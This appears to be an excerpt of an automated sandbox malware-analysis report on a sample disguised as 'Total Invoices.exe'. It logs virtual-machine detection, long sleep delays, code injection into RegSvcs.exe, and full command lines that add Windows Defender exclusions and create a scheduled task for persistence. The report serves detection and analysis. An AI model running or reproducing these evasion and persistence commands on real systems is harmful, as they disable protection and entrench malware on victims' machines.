                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Total Invoices.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: dWXyZYb.exe PID: 7480, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: 15E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: 7F00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: 7910000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: 8F00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: 9F00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: A3D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: B3D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: C3D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory allocated: 12F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory allocated: 2EB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory allocated: 7470000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory allocated: 8470000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory allocated: 85F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory allocated: 95F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory allocated: 9CD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory allocated: 7470000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: DE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 2BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 1170000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 2C30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 2D70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 4D70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Total Invoices.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6763Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 665Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8538Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 414Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1820Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2347Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1846
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1215
                      Source: C:\Users\user\Desktop\Total Invoices.exe TID: 6508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep count: 6763 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep count: 665 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe TID: 7528Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 8028Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 7328Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Total Invoices.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99852Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99619Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99500Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99045Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98930Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98817Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98344Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99766
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99547
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99438
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99313
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99078
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98969
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98844
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98735
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98213
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: RegSvcs.exe, 0000000D.00000002.2890152791.0000000005B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                      Source: RegSvcs.exe, 00000008.00000002.1810859017.0000000006590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FAF008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 634008Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Users\user\Desktop\Total Invoices.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
